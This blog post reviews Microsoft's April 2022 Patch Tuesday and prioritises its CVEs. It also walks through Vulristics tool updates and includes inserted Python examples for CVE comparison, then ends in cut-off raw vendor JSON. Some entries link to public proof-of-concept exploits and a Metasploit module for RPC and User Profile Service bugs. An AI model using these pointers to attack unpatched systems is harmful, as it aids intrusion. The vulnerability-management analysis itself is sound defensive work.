Hello everyone! This episode will be about Microsoft Patch Tuesday for April 2022 and new improvements in my [Vulristics](<https://github.com/leonov-av/vulristics>) project. I decided to add more comment sources, because it's not just Tenable, Qualys, Rapid7 and ZDI that publish Microsoft Patch Tuesday reviews; other security companies and bloggers do too.
Alternative video link (for Russia): <https://vk.com/video-149273431_456239085>
You can see these reviews in my automated security news Telegram channel [avleonovnews](<https://t.me/avleonovnews>) after every second Tuesday of the month. So now Vulristics lets you add any such link as a source of CVE comments.
For April Patch Tuesday I will add these sources:
* [Kaspersky](<https://www.kaspersky.com/blog/microsoft-patches-128-vulnerabilities/44099/>)
* [KrebsOnSecurity](<https://krebsonsecurity.com/2022/04/microsoft-patch-tuesday-april-2022-edition/>)
* [ComputerWeekly](<https://www.computerweekly.com/news/252515909/Microsoft-patches-two-zero-days-10-critical-bugs>)
* [TheHackersNews](<https://thehackernews.com/2022/04/microsoft-issues-patches-for-2-windows.html>)
* [Threatpost](<https://threatpost.com/microsoft-zero-days-wormable-bugs/179273/>)
Let's see if they highlight different sets of vulnerabilities.
```
$ cat comments_links.txt
Qualys|April 2022 Patch Tuesday: Microsoft Releases 145 Vulnerabilities with 10 Critical; Adobe Releases 4 Advisories, 78 Vulnerabilities with 51 Critical.|https://blog.qualys.com/vulnerabilities-threat-research/2022/04/12/april-2022-patch-tuesday
ZDI|THE APRIL 2022 SECURITY UPDATE REVIEW|https://www.zerodayinitiative.com/blog/2022/4/11/the-april-2022-security-update-review
Kaspersky|A bunch of vulnerabilities in Windows, one already exploited|https://www.kaspersky.com/blog/microsoft-patches-128-vulnerabilities/44099/
KrebsOnSecurity|Microsoft Patch Tuesday, April 2022 Edition|https://krebsonsecurity.com/2022/04/microsoft-patch-tuesday-april-2022-edition/
ComputerWeekly|Microsoft patches two zero-days, 10 critical bugs|https://www.computerweekly.com/news/252515909/Microsoft-patches-two-zero-days-10-critical-bugs
TheHackersNews|Microsoft Issues Patches for 2 Windows Zero-Days and 126 Other Vulnerabilities|https://thehackernews.com/2022/04/microsoft-issues-patches-for-2-windows.html
Threatpost|Microsoft Zero-Days, Wormable Bugs Spark Concern|https://threatpost.com/microsoft-zero-days-wormable-bugs/179273/
```
I have also added the links to the [Qualys](<https://blog.qualys.com/vulnerabilities-threat-research/2022/04/12/april-2022-patch-tuesday>) and [ZDI](<https://www.zerodayinitiative.com/blog/2022/4/11/the-april-2022-security-update-review>) blog posts by hand: Qualys still hasn't fixed their blog search (apparently no one uses it), ZDI doesn't have a blog search at all, and DuckDuckGo has stopped indexing them properly.
In addition, Tenable has closed access to [tenable.com](<http://tenable.com>). This is rather ironic considering that the [Russian Tenable Security Day](<https://tenable-day.tiger-optics.ru/>) took place on February 10, 2022, just two months ago. [I participated in it](<https://www.youtube.com/watch?v=V5T3ftcFwdY>). It was a formal event with [Tenable's EMEA CTO and Regional Manager](<https://t.me/avleonovcom/961>). And now it is not just support, updates and licenses for Russian companies and individuals that are gone, but even access to the Tenable website. This is how rapidly the situation can change if you rely on Western vendors. Try not to do this.
But in any case, you can still use the Tenable blog as a source of comments about Patch Tuesday vulnerabilities: I have added SOCKS proxy support to Vulristics. The proxy is configured next to the Vulners API key (the key below is a placeholder), and the dict has the shape the Python requests library expects:

```python
vulners_key = "SFKJKEWRID2JFIJ...AAK3DHKSJD"  # placeholder, not a real key
proxies = {
    'http': "socks5://<host>:<port>",
    'https': "socks5://<host>:<port>"
}
```

One caveat: with the `socks5://` scheme the hostname is resolved on your machine, so if a site is blocked at the DNS level use `socks5h://` instead, which makes the proxy do the name resolution.
I run the command like this:

```
$ python3.8 vulristics.py --report-type "ms_patch_tuesday_extended" --mspt-year 2022 --mspt-month "April" --mspt-comments-links-path "comments_links.txt" --rewrite-flag "True"
```
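The comparison this setup is meant for, done by hand as an added example (my own code, not part of Vulristics and not from the original post): parse the Source|Title|URL lines, fetch each page (optionally through the same kind of SOCKS proxy dict the requests library takes), pull the CVE IDs out of each page and list the IDs that only one source mentions. The source names, URLs and page snippets are constructed; treating a leading `#` as a comment line and the helper names (`parse_comments_links`, `fetch_page`, `compare_sources`) are my assumptions, not Vulristics features.

```python
import re
from typing import Dict, List, Optional, Set, Tuple

# Matches CVE IDs in running text; the sequence part is 4+ digits since 2014.
CVE_RE = re.compile(r"\bCVE-\d{4}-\d{4,}\b", re.IGNORECASE)


def parse_comments_links(text: str) -> List[Dict[str, str]]:
    """Parse Source|Title|URL lines (the comments_links.txt layout) into dicts.

    Assumption (not a Vulristics rule): blank lines and lines starting with '#'
    are skipped. The URL is the last field and may itself contain '|', so the
    line is split at most twice; anything else malformed fails loudly.
    """
    entries: List[Dict[str, str]] = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split("|", 2)
        if len(parts) != 3:
            raise ValueError(f"line {lineno}: expected Source|Title|URL, got {line!r}")
        source, title, url = (p.strip() for p in parts)
        if not source or not url.startswith(("http://", "https://")):
            raise ValueError(f"line {lineno}: bad source or URL in {line!r}")
        entries.append({"source": source, "title": title, "url": url})
    return entries


def fetch_page(url: str, proxies: Optional[Dict[str, str]] = None, timeout: int = 30) -> str:
    """Download one source page, optionally through a SOCKS proxy.

    `proxies` has the same shape as the dict in the Vulristics config, e.g.
    {"http": "socks5h://host:1080", "https": "socks5h://host:1080"}. The requests
    library needs the PySocks extra for SOCKS URLs (pip install requests[socks]);
    socks5:// resolves the hostname locally, socks5h:// lets the proxy resolve it.
    """
    import requests  # imported lazily: everything else in this file runs offline

    resp = requests.get(url, proxies=proxies, timeout=timeout,
                        headers={"User-Agent": "Mozilla/5.0 (comment-source fetcher)"})
    resp.raise_for_status()
    return resp.text


def extract_cves(html: str) -> Set[str]:
    """Every CVE ID mentioned on a page, normalised to upper case."""
    return {m.upper() for m in CVE_RE.findall(html)}


def compare_sources(pages: Dict[str, str]) -> Tuple[Dict[str, List[str]], Dict[str, List[str]]]:
    """Given {source: page_html}, return two maps:
    cve -> sorted sources mentioning it, and source -> CVEs nobody else mentions."""
    per_source = {src: extract_cves(html) for src, html in pages.items()}
    mentions: Dict[str, List[str]] = {}
    for src, cves in per_source.items():
        for cve in cves:
            mentions.setdefault(cve, []).append(src)
    mentions = {cve: sorted(srcs) for cve, srcs in mentions.items()}
    unique = {src: sorted(c for c in cves if len(mentions[c]) == 1)
              for src, cves in per_source.items()}
    return mentions, unique


# Constructed sample input: hypothetical sources, not the real comments_links.txt.
SAMPLE_LINKS = """\
# source|title|url
VendorA|April 2022 Patch Tuesday review|https://vendor-a.example/blog/april-2022
BloggerB|Patch Tuesday, April 2022 Edition|https://blogger-b.example/2022/04/pt
NewsC|Two zero-days and a wormable RPC bug|https://news-c.example/articles?id=42|ref=home
"""

# Constructed page snippets standing in for fetch_page() output.
SAMPLE_PAGES = {
    "VendorA": "<p>Actively exploited: CVE-2022-24521. Wormable: CVE-2022-26809.</p>",
    "BloggerB": "<p>cve-2022-24521 again, plus CVE-2022-26904, which has a Metasploit module.</p>",
    "NewsC": "<p>CVE-2022-26809 and the NFS bugs CVE-2022-24491, CVE-2022-24497.</p>",
}

if __name__ == "__main__":
    for entry in parse_comments_links(SAMPLE_LINKS):
        print(f"{entry['source']:10} {entry['url']}")
    mentions, unique = compare_sources(SAMPLE_PAGES)
    for cve, srcs in sorted(mentions.items()):
        print(f"{cve}: {', '.join(srcs)}")
    for src, cves in unique.items():
        print(f"only {src} mentions: {cves or '-'}")
```

Only `fetch_page` touches the network; replace `SAMPLE_PAGES` with `{e["source"]: fetch_page(e["url"], proxies) for e in parse_comments_links(open("comments_links.txt").read())}` to run it against real sources. The "unique" map is the interesting output: a CVE that only one source bothers to mention is usually either that source's specialty or a sign the others missed something.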
Just like last month, I'm taking into account not only the vulnerabilities published on Patch Tuesday itself, April 12 (117 CVEs), but also the 40 CVEs Microsoft published between the previous Patch Tuesday and this one (2022-03-09 to 2022-04-11). That gives 157 CVEs in the report.
```
MS PT Year: 2022
MS PT Month: April
MS PT Date: 2022-04-12
MS PT CVEs found: 117
Ext MS PT Date from: 2022-03-09
Ext MS PT Date to: 2022-04-11
Ext MS PT CVEs found: 40
ALL MS PT CVEs: 157
```
* Critical: 5
* High: 51
* Medium: 91
* Low: 10
Let's start with the critical ones:
* **Elevation of Privilege** - Windows Common Log File System Driver ([CVE-2022-24521](<https://vulners.com/cve/CVE-2022-24521>)). Exploitation in the wild is reported by both AttackerKB and Microsoft, and Microsoft's CVSS temporal score already marks exploit maturity as Functional. Since this bug only allows privilege escalation, in real attacks it is most likely chained with a separate code execution bug or used after an initial foothold. The vulnerability was reported to Microsoft by the US National Security Agency.
* **Remote Code Execution** - Remote Procedure Call Runtime ([CVE-2022-26809](<https://vulners.com/cve/CVE-2022-26809>)). An unauthenticated remote attacker could exploit this vulnerability by sending "a specially crafted RPC call to an RPC host" and get code execution on the server side with the permissions of the RPC service (CVSS 9.8). Since neither authentication nor user interaction is required, the bug is wormable, at least between machines whose RPC endpoints can be reached. Microsoft's mitigation is to block TCP port 445 at the enterprise perimeter firewall and follow its SMB traffic hardening guidance; that only cuts off the SMB transport at the network edge, so hosts inside the perimeter remain exposed to each other until patched. A proof of concept [is available on GitHub](<https://github.com/XmasSnow1/cve-2022-26809>). Vulristics also rated the other two RPC Runtime RCEs ([CVE-2022-24492](<https://vulners.com/cve/CVE-2022-24492>), [CVE-2022-24528](<https://vulners.com/cve/CVE-2022-24528>)) as Critical, but only because the public exploit was misattributed to them; the only one with an actual exploit is [CVE-2022-26809](<https://vulners.com/githubexploit/706a6eeb-1d07-53eb-8455-f7809863dadc>).
* **Remote Code Execution** - Microsoft Edge ([CVE-2022-1096](<https://vulners.com/cve/CVE-2022-1096>)). In the Vulristics report it was detected as **Unknown Vulnerability Type**, because the type cannot be inferred from Microsoft's description: "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information. Google is aware that an exploit for CVE-2022-1096 exists in the wild." In fact it is the well-known Chrome 0day, a type confusion in the V8 JavaScript engine fixed in Chrome 99.0.4844.84 (Edge 99.0.1150.55), which affected every Chromium-based browser. Exploitation in the wild is mentioned in AttackerKB. The Vulristics report also states "Public exploit is found at Vulners", but the GitHub item behind that flag is just a "Powershell script that dumps Chrome and Edge version to a text file in order to determine if you need to update due to CVE-2022-1096". A repository named after a CVE can be an exploit, a scanner or nothing of the kind, and it is difficult to tell what exactly was uploaded to GitHub without reading it.
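Both problems above (a type that cannot be read off Microsoft's description, and a public exploit credited to every CVE a repository happens to mention) come down to how the text is matched. As an added example, again my own code rather than the actual Vulristics logic, here is a keyword classifier that accepts whatever text is available (third-party comments included) and falls back to "Unknown Vulnerability Type", plus an attribution rule that ties a GitHub repository to the CVE in its name or description only, and marks it as exploit-like only when its description does not read like a scanner or version checker. The repository names, descriptions and README snippets are constructed; the keyword lists are my assumptions and will need tuning on real data.

```python
import re
from typing import Dict, List, Set

CVE_RE = re.compile(r"\bCVE-\d{4}-\d{4,}\b", re.IGNORECASE)

# Checked in order, so the first matching category wins.
VULN_TYPE_PATTERNS = [
    ("Remote Code Execution",
     r"remote code execution|\bRCE\b|arbitrary code execution|execute (?:arbitrary )?code"),
    ("Elevation of Privilege",
     r"elevation of privilege|privilege escalation|escalate (?:their |his |her )?privileges?"),
    ("Security Feature Bypass", r"security feature bypass"),
    ("Information Disclosure", r"information disclosure|memory leak|leak(?:s|ed)? memory"),
    ("Denial of Service", r"denial of service|\bDoS\b"),
    ("Spoofing", r"\bspoofing\b"),
]

# Words that, in a repository's own description, point to a checker rather than an exploit.
NON_EXPLOIT_WORDS = re.compile(
    r"\b(scanner|scan|check(?:er|s|ing)?|detect\w*|version|dump\w*|mitigat\w*|"
    r"workaround|patch(?:er|ing)?|audit\w*|inventory)\b", re.IGNORECASE)
EXPLOIT_WORDS = re.compile(
    r"\b(exploit\w*|poc|proof[- ]of[- ]concept|rce|shell|payload|crash\w*)\b", re.IGNORECASE)


def extract_cves(text: str) -> Set[str]:
    return {m.upper() for m in CVE_RE.findall(text)}


def detect_vuln_type(*texts: str) -> str:
    """Classify from whatever text is available: Microsoft's title and description,
    plus any third-party comments. Returns 'Unknown Vulnerability Type' when nothing
    matches, which is what the bare Chromium-ingest boilerplate produces."""
    blob = " ".join(t for t in texts if t)
    for name, pattern in VULN_TYPE_PATTERNS:
        if re.search(pattern, blob, re.IGNORECASE):
            return name
    return "Unknown Vulnerability Type"


def attribute_repo(repo_name: str, description: str, readme: str = "") -> Dict[str, object]:
    """Decide which CVE a GitHub repository targets and whether it looks like an exploit.

    Rule: the CVE in the repository name (or, failing that, in its description) is the
    target. CVEs that occur only in the README are reported as 'mentioned_only' and
    must not inherit the exploit flag; that is the misattribution the RPC item shows.
    """
    target = extract_cves(repo_name) or extract_cves(description)
    mentioned = extract_cves(" ".join((repo_name, description, readme))) - target
    exploit_like = bool(EXPLOIT_WORDS.search(f"{description} {readme}")) \
        and not NON_EXPLOIT_WORDS.search(description)
    return {
        "target": sorted(target),
        "mentioned_only": sorted(mentioned),
        "looks_like_exploit": exploit_like,
    }


def exploit_flags(repos: List[Dict[str, str]]) -> Dict[str, bool]:
    """Per-CVE 'has a public exploit' verdict over a list of repositories, counting a
    repository only for its target CVEs and only when it looks like an exploit."""
    flags: Dict[str, bool] = {}
    for repo in repos:
        verdict = attribute_repo(repo["name"], repo.get("description", ""), repo.get("readme", ""))
        for cve in verdict["target"]:
            flags[cve] = flags.get(cve, False) or bool(verdict["looks_like_exploit"])
        for cve in verdict["mentioned_only"]:
            flags.setdefault(cve, False)
    return flags


# Constructed sample repositories (not real GitHub projects).
SAMPLE_REPOS = [
    {"name": "cve-2022-26809",
     "description": "PoC exploit for CVE-2022-26809 (RPC runtime RCE)",
     "readme": "Related CVEs fixed in the same update: CVE-2022-24492, CVE-2022-24528."},
    {"name": "chrome-edge-version-check",
     "description": "Powershell script that dumps Chrome and Edge version to a text file "
                    "in order to determine if you need to update due to CVE-2022-1096"},
]

if __name__ == "__main__":
    print(detect_vuln_type("Chromium: CVE-2022-1096",
                           "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) "
                           "ingests Chromium, which addresses this vulnerability."))
    print(detect_vuln_type("Chromium: CVE-2022-1096", "", "a well-known 0day RCE in Chrome"))
    for repo in SAMPLE_REPOS:
        print(repo["name"], attribute_repo(repo["name"], repo["description"], repo.get("readme", "")))
    print(exploit_flags(SAMPLE_REPOS))
```

Running the file shows the Edge CVE going from "Unknown Vulnerability Type" to "Remote Code Execution" once a third-party comment is added to the input, and the RPC repository being counted for CVE-2022-26809 only, while the two CVEs in its README stay at "no public exploit" and the version-dump script never counts as an exploit at all.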
Now let's see the most interesting vulnerabilities with the High level.
* **Elevation of Privilege** - Windows User Profile Service ([CVE-2022-26904](<https://vulners.com/cve/CVE-2022-26904>)). This vulnerability was supposed to have been fixed in the August 2021 update, when it was tracked as CVE-2021-34484. However, the researcher who discovered it later found a bypass, and when that was fixed again in January 2022, he bypassed it a second time. Not only is a PoC out there, there's a [Metasploit module](<https://vulners.com/metasploit/msf:exploit/windows/local/cve_2022_26904_superprofile/>) as well. Successful exploitation gives code execution at SYSTEM level on affected systems. The exploit relies on winning a race condition, which can be tricky to achieve reliably.
* **Information Disclosure** - Windows Kernel ([CVE-2022-24483](<https://vulners.com/cve/CVE-2022-24483>)). Little is known about this vulnerability and none of the sources highlighted it, but there is a [PoC for it on GitHub](<https://github.com/waleedassar/CVE-2022-24483>).
* **Remote Code Execution** - Windows DNS Server ([CVE-2022-26812](<https://vulners.com/cve/CVE-2022-26812>), [CVE-2022-26814](<https://vulners.com/cve/CVE-2022-26814>), [CVE-2022-26829](<https://vulners.com/cve/CVE-2022-26829>)). None of the sources highlighted these either, yet Microsoft's CVSS temporal score marks exploit maturity as Proof-of-Concept. There were 18(!) DNS Server bugs patched this month, so any host with the DNS Server role deserves a look.
For the remaining vulnerabilities, there is neither a sign of exploitation in the wild, nor a sign of a public exploit. Let's see the most interesting ones.
* **Remote Code Execution** - Windows SMB ([CVE-2022-24500](<https://vulners.com/cve/CVE-2022-24500>)). This vulnerability requires that a user on an affected version of Windows connect to a malicious server: the attacker would have to host a specially crafted server share or website and lure the user there, so despite the RCE label it is a client-side bug. Microsoft's mitigation is to block TCP port 445 at the enterprise perimeter firewall (for a client-side bug, outbound connections are what matter). Exploitability Assessment: Exploitation Less Likely. **Remote Code Execution** - Windows Server Service ([CVE-2022-24541](<https://vulners.com/cve/CVE-2022-24541>); Vulristics labeled the product as Windows Kernel) is a similar client-side SMB vulnerability with the same mitigation.
* **Remote Code Execution** - Windows Network File System ([CVE-2022-24491](<https://vulners.com/cve/CVE-2022-24491>), [CVE-2022-24497](<https://vulners.com/cve/CVE-2022-24497>)), CVSS 9.8. An attacker could send a specially crafted NFS protocol network message to a vulnerable Windows machine, which could enable remote code execution. NOTE: this is only exploitable on systems that have the NFS role enabled, so finding out which servers actually run Server for NFS is the first step. Exploitability Assessment: Exploitation More Likely.
As you can see, the additional comment sources mostly repeat what ZDI, Qualys, Rapid7 and Tenable highlight, but sometimes they add interesting details about the vulnerabilities.
The full report is available: [ms_patch_tuesday_april2022_report](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_april2022_report_with_comments_ext_img.html>)
Published 2022-04-23 by Alexander Leonov at <https://avleonov.com/2022/04/23/microsoft-patch-tuesday-april-2022-and-custom-cve-comments-sources-in-vulristics/> (Vulners record AVLEONOV:535BC5E36A5D2C8F60753A2CD4676692).
{"qualysblog": [{"lastseen": "2022-04-19T21:28:45", "description": "## **Microsoft Patch Tuesday Summary**\n\nMicrosoft has fixed 145 vulnerabilities, including 17 Microsoft Edge vulnerabilities, in the April 2022 update, with ten (10) classified as **_Critical_** as they allow Remote Code Execution (RCE). This month\u2019s Patch Tuesday release includes fixes for two (2) zero-day vulnerabilities as well, one (1) known to be actively exploited ([CVE-2022-24521](<http://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24521>)) and the other to be publicly exposed ([CVE-2022-26904](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26904>)).\n\nMicrosoft has fixed several problems in their software, including Denial of Service, Elevation of Privilege, Information Disclosure, Remote Code Execution, and Spoofing vulnerabilities.\n\n## Notable Microsoft Vulnerabilities Patched\n\nThis month\u2019s [advisory](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Apr>) covers multiple Microsoft products, including, but not limited to, Azure, Browser (Edge \u2013 Chromium), Developer Tools, Extended Security Update (ESU), Microsoft Dynamics, Microsoft Office, SQL Server, System Center, and Windows.\n\n### **[CVE-2022-23259](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23259>) | Microsoft Dynamics 365 (on-premises) Remote Code Execution (RCE) Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nAn authenticated user could run a specially crafted trusted solution package to execute arbitrary SQL commands. 
From there the attacker could escalate and execute commands as db_owner within their Dynamics 356 database.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely._**\n\n* * *\n\n### **[CVE-2022-24491](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24491>) and [CVE-2022-24497](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24497>) | Windows Network File System Remote Code Execution (RCE) Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 9.8/10.\n\nAn attacker could send a specially crafted NFS protocol network message to a vulnerable Windows machine, which could enable remote code execution. NOTE: This vulnerability is only exploitable for systems that have the [NFS](<https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview>) role enabled.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely._**\n\n* * *\n\n### **[CVE-2022-24500](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24500>) | Windows SMB Remote Code Execution (RCE) Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nThis vulnerability requires that a user with an affected version of Windows access a malicious server. An attacker would have to host a specially crafted server share or website. An attacker would have no way to force users to visit this specially crafted server share or website, but would have to convince them to visit the server share or website, typically by way of an enticement in an email or chat message. For vulnerability to be exploited, a user would need to access a malicious SMB server to retrieve some data as part of an OS API call. 
Microsoft offers mitigations for this vulnerability; Block TCP port 445 at the enterprise perimeter firewall, and follow [Microsoft guidelines to secure SMB traffic](<https://docs.microsoft.com/windows-server/storage/file-server/smb-secure-traffic>).\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely._**\n\n* * *\n\n### **[CVE-2022-24541](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24541>) | Windows Server Service Remote Code Execution (RCE) Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nThis vulnerability requires that a user with an affected version of Windows access a malicious server. An attacker would have to host a specially crafted server share or website. An attacker would have no way to force users to visit this specially crafted server share or website, but would have to convince them to visit the server share or website, typically by way of an enticement in an email or chat message. Microsoft offers mitigations for this vulnerability; Block TCP port 445 at the enterprise perimeter firewall, and follow [Microsoft guidelines to secure SMB traffic](<https://docs.microsoft.com/windows-server/storage/file-server/smb-secure-traffic>).\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely._**\n\n* * *\n\n### **[CVE-2022-26809](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809>) | Remote Procedure Call (RPC) Runtime Remote Code Execution (RCE) Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 9.8/10.\n\nTo exploit this vulnerability, an attacker would need to send a specially crafted Remote Procedure Call (RPC) to an RPC host. This could result in remote code execution (RCE) on the server-side with the same permissions as the RPC service. 
Microsoft offers mitigations for this vulnerability; Block TCP port 445 at the enterprise perimeter firewall, and follow [Microsoft guidelines to secure SMB traffic](<https://docs.microsoft.com/windows-server/storage/file-server/smb-secure-traffic>).\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely._**\n\n## Notable Adobe Vulnerabilities Patched\n\nAdobe released four (4) [advisories](<https://helpx.adobe.com/security/security-bulletin.html>) with updates to fix 78 vulnerabilities affecting Acrobat, Acrobat Reader, Adobe After Effects, Adobe Commerce, Magento Open Source, and Photoshop. Of these 78 vulnerabilities, 51 are rated as **_Critical_**.\n\n### **[APSB22-13](<https://helpx.adobe.com/security/products/magento/apsb22-13.html>) | Security update available for Adobe Commerce**\n\nThis update resolves one (1) **_Critical_** vulnerability. \n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for Adobe Commerce and Magento Open Source. This update resolves a critical Arbitrary code execution vulnerability. Successful exploitation could lead to arbitrary code execution. \n\n* * *\n\n### **[APSB22-16](<https://helpx.adobe.com/security/products/acrobat/apsb22-16.html>) | Security update available for Adobe Acrobat and Reader**\n\nThis update resolves multiple **_Critical_**, **_Important_**, and **_Moderate_** vulnerabilities and addresses 62 CVEs. \n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 2_\n\nAdobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. Successful exploitation could lead to arbitrary code execution, memory leak, security feature bypass, and privilege escalation. 
\n\n* * *\n\n### **[APSB22-19](<https://helpx.adobe.com/security/products/after_effects/apsb22-19.html>)** | **Security Updates Available for Adobe After Effects**\n\nThis update addresses two (2) **_Critical _**security vulnerabilities. \n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Adobe After Effects for Windows and macOS. Successful exploitation could lead to arbitrary code execution in the context of the current user. \n\n* * *\n\n### **[APSB22-20](<https://helpx.adobe.com/security/products/photoshop/apsb22-20.html>) |** **Security update available for Adobe Photoshop**\n\nThis update addresses 13 **_Critical_** security vulnerabilities. \n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Photoshop for Windows and macOS. Successful exploitation could lead to arbitrary code execution.\n\n## About Qualys Patch Tuesday\n\nQualys Patch Tuesday QIDs are published as [Security Alerts](<https://www.qualys.com/research/security-alerts/>) typically late in the evening on the day of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>) followed later by the publication of the monthly queries for the [Unified Dashboard: 2022 Patch Tuesday (QID Based) Dashboard](<https://success.qualys.com/discussions/s/article/000006821>) by Noon on Wednesday.\n\n## Discover and Prioritize Vulnerabilities in [Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) \n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its Knowledge Base (KB). 
\n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n\n`vulnerabilities.vulnerability:( qid:`91879` OR qid:`91880` OR qid:`91881` OR qid:`91882` OR qid:`91883` OR qid:`91884` OR qid:`91885` OR qid:`91886` OR qid:`91889` OR qid:`91890` OR qid:`110404` OR qid:`110405` OR qid:`110406` OR qid:`376535` )`\n\n\n\n* * *\n\n## Rapid Response with [Patch Management (PM)](<https://www.qualys.com/apps/patch-management/>)\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches pertaining to this Patch Tuesday:\n\n`( qid:`91879` OR qid:`91880` OR qid:`91881` OR qid:`91882` OR qid:`91883` OR qid:`91884` OR qid:`91885` OR qid:`91886` OR qid:`91889` OR qid:`91890` OR qid:`110404` OR qid:`110405` OR qid:`110406` OR qid:`376535` )`\n\n\n\n* * *\n\n## Monthly Webinar Series: This Month in Vulnerabilities & Patches \n\n\n\nThe Qualys Research team hosts a monthly webinar series to help our existing customers leverage the seamless integration between Qualys[ Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) and [Patch Management (PM)](<https://www.qualys.com/apps/patch-management/>). Combining these two solutions can reduce the median time to remediate critical vulnerabilities. \n\nDuring the webcast, we will discuss this month\u2019s high-impact vulnerabilities, including those that are part of this month's Patch Tuesday alert. We will walk you through the necessary steps to address the key vulnerabilities using Qualys VMDR and Patch Management. 
\n\n* * *\n\n### ******Join the webinar******\n\n## ******This Month in Vulnerabilities & Patches******\n\n[Register Now](<https://gateway.on24.com/wcc/eh/3347108/category/97049/patch-tuesday>)\n\n## Contributor\n\n[Bharat Jogi](<https://blog.qualys.com/author/bharat_jogi>), **Director, Vulnerability and Threat Research, Qualys**", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T20:07:30", "type": "qualysblog", "title": "April 2022 Patch Tuesday: Microsoft Releases 145 Vulnerabilities with 10 Critical; Adobe Releases 4 Advisories, 78 Vulnerabilities with 51 Critical.", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-23259", "CVE-2022-24491", "CVE-2022-24497", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24541", "CVE-2022-26809", "CVE-2022-26904"], "modified": "2022-04-12T20:07:30", "id": "QUALYSBLOG:C3DA3EB171A3FE51549E5B118BC0C7BB", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:39:28", "description": 
"[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgbZwO6vnWge-kB0sbo0SgRtCUuTnNCYuc3xeMOyHAyjxQuihLyYRfJUPPNnr9Hdgc6BFVncdVwHE2gIRh9I0SI81pValTrymqbOyAXfBo-FmM1Fwi8nQX6E1Djh0A8ozTup2--3iCklRk1LE5r01IA9Jp0rkAwlGLx5wQY7JvMVnb9DA0493CuD7fG/s728-e100/windows-patch-update.jpg>)\n\nMicrosoft's Patch Tuesday updates for the month of April have addressed a [total of 128 security vulnerabilities](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Apr>) spanning across its software product portfolio, including Windows, Defender, Office, Exchange Server, Visual Studio, and Print Spooler, among others.\n\n10 of the 128 bugs fixed are rated Critical, 115 are rated Important, and three are rated Moderate in severity, with one of the flaws listed as publicly known and another under active attack at the time of the release.\n\nThe updates are in addition to [26 other flaws](<https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) resolved by Microsoft in its Chromium-based Edge browser since the start of the month.\n\nThe actively exploited flaw ([CVE-2022-24521](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24521>), CVSS score: 7.8) relates to an elevation of privilege vulnerability in the Windows 